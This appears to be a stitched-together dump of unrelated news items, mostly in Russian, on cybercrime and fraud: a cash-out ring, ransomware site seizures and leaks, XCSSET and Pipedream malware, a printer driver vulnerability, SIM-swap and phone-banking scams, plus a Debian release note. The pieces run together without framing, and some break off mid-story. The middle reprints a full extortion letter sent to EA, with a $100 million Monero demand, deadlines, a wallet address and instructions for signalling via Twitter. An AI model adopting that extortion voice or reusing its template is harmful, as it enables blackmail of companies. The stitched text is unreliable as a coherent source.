Следственные действия продолжаются.
Воронежские полицейские задержали шесть подозреваемых в незаконной банковской деятельности лиц. Участники группы извлекли доход в размере более 150 млн рублей, сообщает пресс-служба МВД России.
«Сотрудниками отдела экономической безопасности и противодействия коррупции УМВД России по Воронежу совместно с коллегами из регионального УФСБ пресечен факт незаконной банковской деятельности на территории областного центра. В результате проведенного комплекса оперативно-разыскных мероприятий правоохранителями задержано шесть жителей Воронежской области в возрасте от 26 до 35 лет, которые занимались осуществлением банковских операций без регистрации кредитной организации и без наличия лицензии», — говорится в сообщении.
В ходе предварительного следствия установлено, что ими оказывались услуги по обналичиванию денежных средств за денежное вознаграждение физическим и юридическим лицам.
Для незаконной банковской деятельности злоумышленники использовали счета не менее десяти подконтрольных организаций, которые в действительности не вели никакую финансово-хозяйственную деятельность. Банковскими счетами подозреваемые управляли с помощью системы удаленного доступа.
Как правило, клиент перечислял денежные средства на банковские счета указанных организаций по фиктивным основаниям под видом оплаты за оказанные услуги и приобретенные товары. Затем участники группы снимали денежные средства с банковских счетов через кассу кредитного учреждения или при помощи банковских карт через банкоматы и доставляли клиенту.
За время осуществления незаконных банковских операций по кассовому обслуживанию и инкассации денежных средств участники группы извлекли доход в размере более 150 млн рублей.
В отношении фигурантов следственной частью по расследованию организованной преступной деятельности ГСУ ГУ МВД России по Воронежской области возбуждено уголовное дело по признакам преступления, предусмотренного пунктами «а, б» части 2 статьи 172 Уголовного кодекса Российской Федерации «Незаконная банковская деятельность».
В отношении одного из подозреваемых избрана мера пресечения в виде домашнего ареста, в отношении других — подписка о невыезде и надлежащем подведении.
В ходе обысков в жилищах фигурантов и используемых ими офисах изъяты денежные средства, компьютеры и ноутбуки, носители электронной информации, мобильные телефоны, печати и штампы различных организаций, банковские карты и другие предметы.
За совершение данного противоправного деяния законодательством предусмотрено максимальное наказание в виде лишения свободы на срок до семи лет.
Threat actors called Vanir Ransomware Group posted a few listings in July. Tonight, however, their onion site has a seized message:
” THIS HIDDEN SITE HAS BEEN SEIZED
by the State Bureau of Investigation Baden-Württemberg as a part of a law
enforcement action taken against Vanir Ransomware Group “
From a press release about the seizure, it sounds like there have been no arrests, and the identity of the threat actors is not yet known.
Cyjax had a [write-up on Vanir Group](https://www.cyjax.com/data-leak-site- emergence-continues-to-increase/) in August, with screencaps of their Tor site and some preliminary information on the group.

Source: [https://databreaches.net/2024/09/18...-onion-site-seized-by-german- law-enforcement/](https://databreaches.net/2024/09/18/vanir-ransomware-group- onion-site-seized-by-german-law-enforcement/)
A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps.
XCSSET came into the spotlight in [August
2020](https://www.trendmicro.com/en_us/research/20/h/xcsset-mac-malware--
infects-xcode-projects--uses-0-days.html) after it was found to spread via
modified Xcode IDE projects, which, upon the building, were configured to
execute the payload. The malware repackages payload modules to imitate
legitimate Mac apps, which are ultimately responsible for infecting local
Xcode projects and injecting the main payload to execute when the compromised
project builds.
XCSSET modules come with the capabilities to steal credentials, capture
screenshots, inject malicious JavaScript into websites, plunder user data from
different apps, and even encrypt files for a ransom.
Then in March 2021, Kaspersky researchers [uncovered](https://securelist.com/malware-for-the-new-apple-silicon- platform/101137/) XCSSET samples compiled for the new Apple M1 chips, suggesting that the malware campaign was not only ongoing but also that adversaries are [actively](https://thehackernews.com/2021/02/first-malware- designed-for-apple-m1.html) [adapting](https://thehackernews.com/2021/02/new- silver-sparrow-malware-infected.html) their executables and porting them to run on new Apple Silicon Macs natively.
[](https://thehackernews.com/images/-i139eBbfU_g/YH1W7-F_sgI/AAAAAAAACS4/1fzc12bCu5sD-
ryOjLQVMqj916HNjMiKACLcBGAsYHQ/s0/hacker.jpg)
The latest research by Trend Micro shows that XCSSET continues to abuse the
development version of the Safari browser to plant JavaScript backdoors onto
websites via Universal Cross-site Scripting (UXSS) attacks.
"It hosts Safari update packages in the [command-and-control] server, then downloads and installs packages for the user's OS version," Trend Micro researchers [said](https://www.trendmicro.com/en_us/research/21/d/xcsset- quickly-adapts-to-macos-11-and-m1-based-macs.html) in an analysis published on Friday. "To adapt to the newly-released Big Sur, new packages for 'Safari 14' were added."
In addition to trojanizing Safari to exfiltrate data, the malware is also
known for exploiting the [remote debugging
mode](https://www.trendmicro.com/en_us/research/20/i/xcsset-update-browser-
debug-modes-inactive-ransomware.html) in other browsers such as Google Chrome,
Brave, Microsoft Edge, Mozilla Firefox, Opera, Qihoo 360 Browser, and Yandex
Browser to carry out UXSS attacks.
What's more, the malware now even attempts to steal account information from
multiple websites, including cryptocurrency trading platforms Huobi, Binance,
NNCall.net, Envato, and 163.com, with abilities to replace the address in a
user's cryptocurrency wallet with those under the attacker's control.
XCSSET's mode of distribution via doctored Xcode projects poses a serious threat, as affected developers who unwittingly share their work on GitHub could pass on the malware to their users in the form of the compromised Xcode projects, leading to "a [supply-chain-like attack](https://thehackernews.com/2021/03/hackers-infecting-apple-app- developers.html) for users who rely on these repositories as dependencies in their own projects."
24 сентября 2024 года организация GreatFire опубликовала исследование, которое раскрывает значительное количество удалений VPN-приложений компанией Apple из российского App Store. В исследовании использовались данные платформы App Store Monitor (ASM) на сайте AppleCensorship.com, которая отслеживает доступность приложений в магазинах Apple.
Согласно исследованию, за период с начала июля по 18 сентября 2024 года Apple удалила почти 60 VPN-приложений из российского App Store, тогда как Роскомнадзор официально заявлял о блокировке по его требованию в App Store 25 VPN-приложений. В итоге на российском рынке стало недоступно 98 VPN-программ. Более 20% протестированных VPN-приложений были заблокированы без публичных уведомлений, что подрывает прозрачность в российском App Store.
Кроме того, исследование выявило, что удаления происходили в определенные даты, что указывает на возможную координацию действий со стороны Apple. Компания могла удалять приложения не только по запросам Роскомнадзора, но и по собственной инициативе.
Цель исследования заключалась в том, чтобы проверить данные Роскомнадзора, согласно которым Apple удалила 25 VPN-приложений по запросу российских властей. Также было необходимо оценить масштабы блокировки VPN со стороны российских властей, определить количество заблокированных VPN и степень их недоступности в российском App Store.
В ходе работы было протестировано более 360 VPN-приложений по всему миру, проведено более 63 тысяч тестов в 175 магазинах приложений. Как выяснилось, к сентябрю 2024 года в российском App Store стало недоступно 98 VPN-сервисов.
Удаления происходили в несколько этапов. До июля 2024 года уже были недоступны 32 приложения, с 4 по 7 июля было удалено еще 12, включая такие популярные сервисы, как CyberGhost VPN и ExpressVPN. Затем, с 8 июля по 11 августа, Apple удалила еще 30 приложений.
Организация настаивает на том, чтобы Apple раскрыла причины удаления VPN- приложений и, в случае действий вне запросов российских властей, объяснила свою позицию.
applecensorship.com/news/unveiling-the-extent-of-vpn-app-removals-by-apple-
from-the-russia-app-store-an-analysis-of-silent-removals-and-the-need-for-
transparency
applecensorship.com/news/apple-is-silently-removing-vpn-apps-from-russias-app-
store
Злоумышленники похитили средства, находящегося в СИЗО бывшего министра Олега Митволя.
Мошенники украли у находящегося в СИЗО экс-главы Росприроднадзора Олега Митволя 25 миллионов рублей.
Инцидент произошел 27 июня, через 17 дней после задержания чиновника. Житель Екатеринбурга по фамилии Ершов вместе с сообщниками подделали паспорт Митволя. С документом злоумышленники пришли в салон "Билайна" и сделали дубликат сим- карты чиновника.
Получив доступ к номеру, мошенники зашли в личный кабинет онлайн-банка и в течение двух недель вывели со счетов Митволя почти 25 миллионов рублей, которые затем обналичили через банкоматы в Екатеринбурге.
Подозреваемый в мошенничестве Ершов был задержан правоохранителями и сейчас находится в СИЗО.
Напомним, что 10 июня 2022 года центральный суд Красноярска отправил под арест бывшего замглавы Росприроднадзора и префекта Северного административного округа Москвы Олега Митволя. Экс-чиновник проходит по делу о хищении 975,2 млн руб. при строительстве метро в Красноярске. По версии следствия, компания Митволя получила деньги за невыполненные инженерные изыскания и устаревшую проектную документацию.
source: t.me/kras_mash/2635
Эта утечка данных стала одной из самых крупных за всю историю Бельгии.
Хакеры Ragnar Locker опубликовали на своем сайте украденные данные, которые,
как они думали, принадлежали муниципалитету бельгийского города Звейндрехт. Но
на самом деле опубликованная информация принадлежала полиции Звейндрехта.
Специалисты проанализировали слитые данные и нашли в них тысячи номерных
знаков автомобилей, записи о штрафах, файлы с криминальными отчетами, данными
о полицейских, отчеты о расследованиях и многое другое. Такая утечка данных
ставит под удар не только людей, но и текущие операции правоохранительных
органов.
Бельгийские СМИ называют эту утечку данных одной из крупнейших утечек в сфере
государственных учреждений, так как хакеры опубликовали данные, которые
хранила полиция Звейндрехта с 2006 года по сентябрь 2022 года.
Бельгийская полиция незамедлительно отреагировала на сообщения местных СМИ,
написав в своих соцсетях, что все не так плохо – злоумышленники смогли
получить доступ только к части сети, где хранились административные данные
полиции. Поэтому в первую очередь пострадают работники правоохранительных
органов, а не обычные граждане.
И хотя этот инцидент никак не повлиял на национальную полицейскую сеть
Бельгии, взлом сети Звейндрехта может причинить вред тысячам людей, так как
среди слитых данных были метаданные абонентов телекоммуникационных услуг и
SMS-сообщения людей, находящихся под тайным полицейским следствием. Кроме
того, в украденных файлах были записи с дорожных камер.
Управление по защите данных Бельгии пока не объявило о начале расследования
этого инцидента, однако прокурор возбудил уголовное дело, связанное с самим
киберинцидентом.
Закрученная история в стиле боевика «Скольжение» про беспредел наркополицейских из Саратовской области стала известна Rucriminal.info и ВЧК- ОГПУ.
Часть 1
В провинциальном городе Балаково со дня на день будет вынесен приговор паре молодых людей — Максиму и Елизавете. Парень занимается музыкой и до задержания трудился автоинструктором. Девушка учитель начальных классов.
Объективно, они не безгрешны — незадолго до падения «Гидры» (некогда крупнейшая площадка в Даркнете, где торгуют запрещёнными товарами) ребята, по их признанию, имели отношение к наркотрафику. С июля по декабрь прошлого года они договорились в Сети с анонимом забирать закладки с наркотиками, расфасовывать вещества и оставлять их для закладчиков. То, что они вовремя завязали с грязным делом, подтверждают скриншотами со своего аккаунта и перепиской с работодателем.
27 января, день перед задержанием Максим с девушкой провели активно. Были в больнице, закупились продуктами, посетили собачий приют, а вечером поехали в бар. Домой поехали ночью, и когда Максим вышел из такси, к нему подошёл неизвестный. Мужчина бросил дежурное «дай закурить» и брызнул из газового болона ему в лицо. Далее, по словам парня, его били, лазили по карманам, и отвезли в отдел ОКОН. В кабинете, куда его завели, находилось пять человек сотрудников во главе с заместителем начальника Дмитрием Климовым. Он назвал Максиму магазин, с которым тот сотрудничал, а его коллеги (Улитин, Бастанов) по классике под крики сожительницы, доносящиеся из соседнего кабинета, выдвинули ультиматум: чистосердечное или специфические методы допроса даме, а ему «петушиная хата» в СИЗО. Когда задержанный пытался сказать, что больше не занимается наркотиками, ему ответили, что придётся ответить за старые дела. Под утро были приглашены понятые с района, ранее судимые по наркотическим статьям, ныне запойные алкоголики.
Нетрудно догадаться, что сотрудники извлекли из кармана 7 свёртков в чёрной изоленте, начинённых синтетикой. У барышни нашли при себе 5 свёртков с гашишем. С такими гостинцами, по версии следствия, пара каталась весь день по городу, и под утро вернулась домой. К слову, медицинское освидетельствование задержанным даже не проводилось, сотрудники наверняка знали, что анализы будут чистыми.
Как рассказали собеседники Rucriminal.info, обследование жилища (именно обследование, не обыск) проводили те же лица. В квартире при входе в выдвижном ящике были найдены 2 катушки изоленты и 5 свёртков с «солью». Максим настаивает, что они не могли контролировать перемещения полицейских по дому, а ключи от квартиры были в руках у ОКОНщиков с момента досмотра. Вся процедура продлилась 45 минут, за это время была обследована «трёшка».
До вечера следующего дня Максима выводили несколько раз на разговор. Беседы с операми сводились к тому, что кому-то из пары «надо загрузиться», чтобы он подумал о девушке, родственниках. И в итоге, он признался. Следователь попросил у суда домашний арест для обоих задержанных — это связано с логистикой, СИЗО находится в другом городе и доставка подследственных усложнила бы работу сотрудникам.
В родных стенах Максим связался с сотрудником УСБ. И с этого момента тривиальный по нынешним меркам сюжет превратился в настоящий детектив.
Часть 2
Если бы не эта и следующая часть собственного расследования, то Rucriminal.info и ВЧК-ОГПУ не обратил бы внимания на дело Максима.
Сотрудник УСБ МВД по Саратовской области капитан полиции Геннадий Клемешин выслушал обвиняемого и сообщил, что это не первый сигнал из Балаковского отдела по контролю за оборотом наркотиков. По его словам, он заручился поддержкой начальства на проведение ОРМ, и его агент из ОКОН подтвердил ему, что наркотики молодым людям подкинули.
Вместе с тем он предложил поучаствовать в оперативных мероприятиях, мол, оперативники коррумпированы и обязательно появятся в жизни Максима с предложением. На этот случай «особист» оставил подопечному портативный диктофон в виде флешки. Сотрудник заверил, что если получится поймать наркополицейских на взятке, то получится раскрутить их и на подброс. А пока у Максима только слова и любое заявление будет выглядеть, как попытка отмазаться. С этого момента контролировал все действия и продумывал диалоги Клемешин.
Через две недели к Максиму действительно пришёл посредник — человек с репутацией в городе «ровно между ментами и бандитами» Аркадий. Гость несколько раз наносил визиты, рассказывал подробности дела, мол, он в курсе беды и хочет помочь. По его словам, оперативники Бастанов и Метельников его друзья. Потом и сами сотрудники наведывались в гости. В конце концов, весной в одну из ночей Максиму позвонил Аркадий и сказал, что будет говорить с его отцом. Была назначена встреча, на которую родитель взял ту самую «флешку». Отца Максима в машине ждали Аркадий и Бастанов. Они долго катали его по городу и «зарядили» 2,5 миллиона рублей за снижение срока на 2 года.
Сотрудник УСБ рекомендовал сбить цену, а когда сумма упала до 1,8 миллиона, обещал… перевести деньги в назначенную дату. Но в день Икс ни одна сторона не вышла на связь с отцом Максима.
9 апреля вышел на связь Клемешин и сообщил, что благодаря местным ребятам из ОСБ и ФСБ ему удалось устроить раскол в отделе наркоконтроля. По его словам, оперативник Улитин имел зуб на коллег, так как ему приходилось делать «грязную работу», а из коррупционного общака с ним не делились. «Особист» забрал у подопечного флешку и отправился с ней на встречу с дрогнувшим опером. С его слов, собеседник просил иммунитет в обмен на признание, и сдал сослуживцев с потрохами под запись. Аудиенция проходила в тот же день в 22.00. Улитин рассказал Клемешину про эпизод с Максимом, назвав автором идеи начальника Климова, исполнителем опера Метельникова, а на бумаге оформлял операцию наблюдение Пронин. Более того, по оперативным данным, магазином в Даркнете могли заведовать никто иные, как борцы с наркотиками.
Все переписки об этом, личные беседы с усбшником записаны и сохранены Максимом.
Могло показаться, что дело в шляпе, но после того, как Клемешин отрапортовал о победе, все пошло не по плану. Через некоторое время сотрудник УСБ написал Максиму, что на ключевую аудиозапись наложен гриф секретности. И пропал. А полицейские из ОКОН, как десять негритят, один за другим покинули свой отдел. Улитин написал рапорт и перевёлся в дежурную часть соседнего села. Сотрудник Пронь был пойман пьяным за рулем. Ближе к лету Бастанов уволился из ОВД. А Метельников был разжалован в участковые.
Часть 3
В мае и июне Максимом были поданы первые заявления в УСБ и СК.
За это время обвиняемый изменил свои показания. Девушка пыталась покончить с собой и её положили в психушку. Помимо первого дела, ей инкриминируют ещё два эпизода — в её телефоне были найдены фотографии с координатами, где были обнаружены «закладки». Она категорически отрицает какое-либо отношение к этим делам. И, если разобраться, то дополнительные обвинения выглядят, как закрепление реализации, причём, собранное на скорую руку.
В материалах дела не были указаны адреса и телефоны понятых. Один из них — Дмитрий Нуриев зарабатывает на хлеб ведением корпоративов и праздников. Второй — Александр Стеньшин трудится инспектором ГИМС и подрабатывает диджеем на мероприятиях. Закладки, которые повесили на девушку, были выкопаны в субботу, 5 февраля. Логично, что коллеги-понятые могли работать в этот день недели. И предположение подтвердилось. Днём ранее день рождения отмечала жена Нуриева и компания арендовала дом в селе, далеко от координат с наркотой. Один из гостей подтвердил, что 5 февраля оба понятых были с ним на даче и никуда не выезжали. Судя по присланным им фотографиям, с ними в компании гулял и уже известный нам оперативник по фамилии Пронь.
Сейчас подходит к завершению процесс. Понятые, со слов, уехали, находятся в других регионах и суд решил их не допрашивать. Правда, под предлогом заказа для ведущего представителю Максима удалось встретиться с ним в родном городе.
Другие понятые, присутствовавшие якобы при изъятии наркотиков у парня, в суде дали неожиданные показания. Один из них откровенно сказал, что его заставили поучаствовать в следственных действиях. Мужчина на тот момент был в запое, и ему сказали, что либо его «упакуют» на сутки административного ареста, либо он будет понятым. В отделе он даже не посмотрел на документы и вслепую их подписал. Также, в суде они подтвердили, что один из них знаком с оперативником Бастановым, так как последний, будучи ещё сотрудником ППСП и задерживал его раньше.
После этого Максима вызвали в Следственный комитет, где он рассказал свою историю и передал все материалы. Там заверили, что уже на связи с Клемешиным, и обмениваются информацией, однако, хода делу пока никто не даёт.
source: rucriminal.info/ru/material/dragmagazinom-v-darknete-zavedovali-borcy- s-narkotikami
EA Blackmail EMail Leak
Would you pay this skid jerks?
Hello EA
we are the Hackers who breached your src and other data
First of all we apologize to harm your company and reputation
well what is the motive behind any hack Money right ?
so we are here to discuss related to this thing
we checked your statement on media where you mentioned ""No player data was accessed, and we have no reason to believe there is any risk to player privacy,
Is this really true? We, in fact, got to some of your production database we have database (around 2TB of pure data)
As you already know
we have src , tools + unrevealed 2tb pure data
with respect you also know if we leak this it can be big trouble for your company
that's why i have a idea best offer to you
we never sell your data to anyone
only my team have this data if we want to kept his all private we can
the deal is Pay us 100 mil$ in xmr (monero)
we will never disclose your any type of data in public even we take full responsibility it will never leak and it will deleted from our system too
You have 7 days for paying us first 33.34 mil$ to the first address
After 8 th day we will contact news to tell them we have user data.
After the 9th day we will start to post some part of your source code every day on the deepweb til the first payment is completed.
we gave you the best offer if you pay in delay, everything will be deleted and your company can run,We have no interest in leaking if you pay. I know this sound like a ransomware, but just for one time, trust us. We just want money
we know your are afraid of scammers
we sending you here our proof ofdata for your trustSo, how's that we gonna proceed,
You will maintenance your fifa 21 servers the 5th of july at any time,
Before the maintenance, you will post a message on your twitter account (@EA)
After the first payment completed, you will have 2weeks to send the other 66.66mil USDData : USER_EVENT_SESSION_ENGA... Rows : 348.0G Size : 30.3TB
USER_EVENT_ECONOMY Rows : 108.5G Size : 11.4TB
USER_EVENT_MESSAGING Rows : 190.9G Size : 11.2TBI really hope you understand that we are not kidding and we are friendly.
Thoses addresses are one time payment, mean you can't send two time to an address.so here is out payment address
XMR : 42qLW1FiEDQKjeoSAFQRXaVpSUxB8fTYJ2Zeah8dcDTYDEjCb71iCR76ctGMysAB4nj3MTTCE5GuJMsC1eLuwKdu7v6FKf3
again we are sorry but you know during this pandemic we all need money , just all people ways are different
i hope you will send the first payment in less than 7 days so we can continue
Instruction : Well for our own reasons we don't use any direct contact with you
we will use indirect contact method
So, I will give you some written content which you will post from your Twitter account so that we can understand.
if you are ready and make payment with the address
post on your twitter account : "maintenance from 5 July 10 to 11 UTCIf you posted this we will understand you are ready to make the payment and we will proceed
In Case you want to deny our golden offer
post :
or if you need some more time post "just report this to any reporter and made news again we so we understand you deny our offer and we will start to posting our code and start selling other sensitive data"in one line : if you agree do a maintenance 5th of july from 10 to 11 UTC AND POST ON TWITTER
We need 33.34 mil in this week after this We will recontact you in some timesWhen the first payment will be completed we will delete 50% of what we have
On the third payment we will delete the database from our servers
You will have 2 weeks to pay the others payment
33.34 mil in this week after this We will recontact you in some times
When the first payment will be completed we will delete 50% of what we have
On the third payment we will delete the database from our servers
You will have 2 weeks to pay the others payment
hope you will understand and pay us as fast as you canLast thing
If possible, do not tell this to the reporter and LE shits because we also do not want your reputation and worth to be down.Click to expand...
ИБ-эксперты нашли в драйверах к принтерам HP, Samsung и Xerox опасную брешь, которую хакеры могли эксплуатировать для получения прямого доступа к ПК. «Дыра» появилась в драйверах еще в 2005 г., но устранили ее лишь спустя 16 лет.
Почти совершеннолетняя уязвимость
В драйверах к принтерам компаний HP, Samsung и Xerox обнаружена уязвимость, позволяющая взламывать компьютеры и повышать привилегии пользователя до уровня администратора. По информации портала TheRecord.Media, проблема существовала 16 лет, а обнаружить ее удалось лишь в 2021 г.
Брешь выявили в феврале 2021 г. эксперты компании SentinelOne, работающей в области информационной безопасности. Ей присвоили идентификатор CVE-2021-3438.
По утверждению специалистов, уязвимость появилась в коде драйвера в 2005 г., то есть еще во времена Windows XP и за два года до выхода ныне устаревшей Windows Vista. За эти годы HP на пару с Samsung и Xerox выпустили миллионы принтеров, работающих с этим драйвером. Например, Samsung и HP разработали 380 моделей таких печатающих устройств, а Xerox – еще 16. Суммарное количество поступивших в продажу принтеров, использующих «дырявый браузер», не установлено.
Как утверждают сотрудники SentinelOne, на 20 июля 2021 г. в мире не было зафиксировано ни одного случая использования CVE-2021-3438. Тем не менее, этой уязвимости как минимум 16 лет, что значительно увеличивает вероятность осведомленности о ней хакеров-одиночек и киберпреступных группировок.
Что делает уязвимость
Согласно описанию уязвимости, предоставленному SentinelOne, CVE-2021-3438 – это брешь переполнения буфера в файле SSPORT.SYS драйвера печати. Хакеры могут использовать ее для повышения своих прав в ОС на компьютере жертвы.
Подобный ход даст им полный контроль над этим компьютером. Они смогут, к примеру, получить доступ ко всем файлам на нем, а также права администратора или запустить на нем любое нужное им вредоносное ПО.
Со слов эксперта SentinelOne Асафа Амира (Asaf Amir), в ряде случаев, чтобы оказаться в зоне риска, пользователю даже не нужно самостоятельно устанавливать дырявый драйвер принтера. Амир утверждает, что этот драйвер может появиться в Windows при первом же подключении принтера к компьютеру, если на нем есть доступ в интернет и не отключен «Центр обновления Windows».
Если просто отключить принтер от компьютера, проблему это не решит. Нужно или полностью удалять драйвер, или ставить его новую безопасную версию.
Производители все исправили
Специалисты SentinelOne обнаружили CVE-2021-3438 еще в феврале 2021 г. На 20 июля 2021 г. она была исправлена компанией HP – обновленный драйвер для ее принтеров, а также для принтеров Samsung можно скачать с сайта компании. Xerox тоже разместила драйвер со встроенным патчем на своем портале – на момент публикации материала он тоже был доступен для скачивания.
Компания Samsung не стала самостоятельно выпускать отдельный драйвер для принтеров, поскольку больше не занимается производством устройств для печати. Как сообщал CNews, свой принтерный бизнес она продала компании HP еще пять лет назад, в сентябре 2016 г. Сумма сделки составила $1 млрд.
Принтеры как инструмент для взлома
Домашние и офисные принтеры нередко становятся незапертыми «воротами» для хакеров, желающих пробраться на чужой компьютер. Часто в подобной ситуации оказываются принтеры HP как лидера мирового рынка.
По итогам I квартала 2021 г. у HP была 42,4-процентная доля в глобальных поставках принтеров (статистика Statista.com). В тройку лидеров также входили Canon и Epson 18,5% и 19,4% соответственно, за ними шли Brother (7,2%) и Kyocera Group (1,8%). Все остальные компании поделили оставшиеся 10,8% рынка.
CNews писал, что в августе 2017 г. в более чем 50 моделях принтеров HP бизнес- класса была найдена крупная уязвимость. Ее обнаружили специалисты сообщества FoxGlove Security, и ей была присвоена метка CVE-2017-2750.
Она, как и CVE-2021-3438, позволяла исполнять вредоносный код. HP исправила брешь лишь в конце ноября 2017 г.
В начале июля 2021 г. была найдена новая «дыра», затрагивающая принтеры, но на этот раз она была не в их ПО, а непосредственно в ОС Windows. Она открывала хакерам полный доступ к ПК и серверам через «Диспетчер печати».
У Microsoft поначалу не было готового патча, и она рекомендовала всем отключить эту службу и тем самым лишиться возможности печатать документы. Через несколько дней патч был готов, но его установка ломала работу принтеров ряда известных производителей.
10 июня 2023 года вышел в релиз
Debian 12 «Bookworm». Популярный дистрибутив
доступен для девяти официально поддерживаемых архитектур, включая Intel
IA-32/x86 (i686), AMD64/x86-64, ARM EABI (armel), ARM64, ARMv7 (armhf),
mipsel, mips64el, PowerPC 64 (ppc64el) и IBM System z (s390x). Обновления для
Debian 12 будут выпускаться разработчиками проекта в течение 5 лет.
В Debian 12 «Bookworm» обновлён графический стек и пользовательские окружения, включая GNOME 43, KDE Plasma 5.27, LXDE 11, LXQt 1.2.0, MATE 1.2, Xfce 4.18, Mesa 22.3.6, X.Org Server 21.1, Wayland 1.21. В окружениях с GNOME по умолчанию задействован мультимедийный сервер Pipewire и менеджер звуковых сеансов WirePlumber.
Ядро Linux в Debian 12 обновлено до версии 6.1. В Debian 11 поставлялось ядро Linux 5.10. Также там обновлены systemd 252, Apt 2.6 и Glibc 2.36.
Debian 12 вышел спустя 1 год, 9 месяцев и 28 дней спустя выхода релиза Debian 11 «Bullseye», который состоялся 14 августа 2021 года. Тогда в проекте участвовали более 6 тыс. разработчиков.
Команда проекта [выпустила](https://www.debian.org/releases/bookworm/amd64/release-notes/ch- upgrading.en.html) инструкцию для миграции на Debian 12 с Debian 11.
Согласно информации OpenNET, в репозитории Debian 12 представлено 64419 бинарных пакетов, что на 4 868 пакетов больше, чем было предложено в Debian 11. По сравнению с Debian 11, там добавлено 11 089 новых бинарных пакетов, удалено 6 296 (10%) устаревших или заброшенных пакетов, обновлено 43 254 (67%) пакетов. Общий суммарный размер всех предложенных в дистрибутиве Debian 12 исходных текстов составляет 1 341 564 204 строк кода. Суммарный размер всех пакетов - 365 ГБ. Для 96,3% (в прошлой ветке 95,7%) пакетов обеспечена поддержка повторяемых сборок, позволяющих подтвердить, что исполняемый файл собран именно из заявленных исходных текстов и не содержит посторонних изменений, подстановка которых, например, может быть совершена путём атаки на сборочную инфраструктуру или закладки в компиляторе.
На сайте проекта разработчика опубликованы списки основных изменений и [обновлений](https://www.debian.org/releases/bookworm/amd64/release-notes/ch- whats-new.en.html) в Debian 12.
В начале июня разработчики проекта предупредили, что релиз Debian 12 «Bookworm» выйдет по плану, но там остаются баги и сотня незакрытых ошибок. Они пояснили, что пользователям лучше дождаться июльской версии 12.1, а не ставить сразу эту сборку во избежание проблем со стабильностью. Ожидается, что версия Debian 12.1 должна выйти примерно в июле.

Набор вредоносного программного обеспечения, известный как Pipedream ,
является, возможно, самым универсальным инструментом, когда-либо созданным для
атак на критически важную инфраструктуру, такую как энергосистемы и
нефтеперерабатывающие заводы.
ВРЕДОНОСНОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ, ПРЕДНАЗНАЧЕННОЕ ДЛЯ атак на промышленные системы управления, такие как энергосистемы, фабрики, водоканалы и нефтеперерабатывающие заводы.
Министерство энергетики, Агентство по кибербезопасности и безопасности инфраструктуры, АНБ и ФБР в среду совместно выпустили бюллетень о новом наборе хакерских инструментов, который, возможно, сможет предоставлять несанкционированный доступ к широкому спектру функций промышленных систем управления. Это вредоносное программное обеспечение содержит больше инструментов, предназначенных для нарушения работы устройств или получения контроля над ними, чем какой-либо из предыдущих наборов инструментов для взлома промышленных систем управления. Новый набор содержит в том числе и программируемые логические контроллеры (PLCs), которые продаются Schneider Electric и OMRON и предназначены для использования в качестве интерфейса между традиционными компьютерами и исполнительными механизмами и датчиками в промышленных условиях.
Другой компонент вредоносного программного обеспечения предназначен для атак на серверы унифицированной архитектуры Open Platform Communications — компьютеры, которые взаимодействуют с PLCs. «Это самый мощный инструмент для атак на промышленные системы управления, который когда-либо был задокументирован», — утверждает Серхио Кальтаджироне, вице-президент по анализу угроз в компании Dragos, специализирующейся на промышленной кибербезопасности, которая предоставила результаты исследования для бюллетеня и опубликовала собственный отчет о вредоносном программном обеспечении.
Исследователи из других компаний также внесли свой вклад в подготовку рекомендаций. «Это похоже на швейцарский армейский нож с огромным количеством деталей».
Dragos говорит, что вредоносное программное обеспечение может захватывать целевые устройства, нарушать их работу или блокировать доступ операторов к ним, выводить их из строя навсегда или даже использовать в качестве плацдарма, чтобы предоставлять доступ к другим частям сети промышленной системы управления. Он отмечает, что, хотя набор инструментов, который Dragos называет «Pipedream », по всей видимости, предназначен специально для атак на контроллеры Schneider Electric и OMRON, он работает за счет использования базового программного обеспечения этих контроллеров, известного как Codesys, которое гораздо более широко используется в сотнях других типов контроллеров. Это означает, что вредоносное программное обеспечение легко может быть адаптировано для работы практически в любой промышленной среде. «Этот набор инструментов настолько велик, что представляет угрозу практически для всех», — говорит эксперт.
Dragos также отказался комментировать происхождение вредоносного программного обеспечения. Однако Кальтаджироне говорит, что на самом деле его еще не применяли против жертв — или, по крайней мере, он еще не вызывал реального физического воздействия на промышленные системы управления жертв. «Мы можем с высокой уверенностью сказать, что он еще не был применен для получения разрушительных или деструктивных последствий», — говорит эксперт.
Хотя адаптируемость набора инструментов означает, что его можно использовать практически в любой промышленной среде, от производств до очистки воды, Dragos отмечает, что очевидное внимание к PLCs Schneider Electric и OMRON позволяет предположить, что набор был создан именно для атак на энергосистемы и нефтеперерабатывающие заводы — особенно на установки по сжижению природного газа, — учитывая широкое использование Schneider в электроэнергетике и OMRON — в нефтегазовом секторе. Кальтаджироне предполагает, что возможность отправлять команды серводвигателям на этих нефтехимических предприятиях через контроллеры OMRON будет особенно опасна, поскольку может привести к «разрушениям или даже гибели людей».
Эксперты говорят, что Pipedream эксплуатирует множество уязвимостей нулевого дня, которые все еще устраняются. Также отмечаеться, что даже исправление этих уязвимостей не поможет обезвредить большинство функций Pipedream , поскольку оно в значительной степени предназначено для захвата конкретных функций целевых устройств и отправки санкционированных команд в используемых протоколах.
Перевод, источник: hxxps://www.wired. com/story/pipedream-ics-malware/
Центральным (г. Минска) районным отделом Следственного комитета возбуждено уголовное дело о хищении более 37 тысяч рублей с карт-счета пенсионерки.
По данным следствия, днем 4 июня этого года через мессенджер Viber 64-летней женщине позвонил мужчина и представился работником службы безопасности банка.
В ходе общения собеседник сообщил, что им поступила информация о мошеннических действиях, которые совершаются с денежными средствами потерпевшей. Женщину убедили в том, что она должна снять все имеющиеся на счете средства и положить их на счет в другом банке.
На следующий день потерпевшей вновь позвонил тот же мужчина и поинтересовался выполнила ли она его указания. Взяв хранящиеся дома денежные средства в сумме более 5 тысяч долларов США, женщина направилась в банк. Пенсионерка сняла со счета все деньги, после чего имеющиеся наличные положила на карт-счет именно в том банке, в котором советовал лжебанкир. Следует отметить, что собеседник все время был на связи по телефону и контролировал ее действия.
Спустя пару дней якобы представитель банка убедил минчанку в том, что она должна оформить на свое имя кредит на сумму 5 800 рублей. Потерпевшая выполнила и эту просьбу. Полученные денежные средства она положила на ранее открытый, по совету лжебанкира, счет.
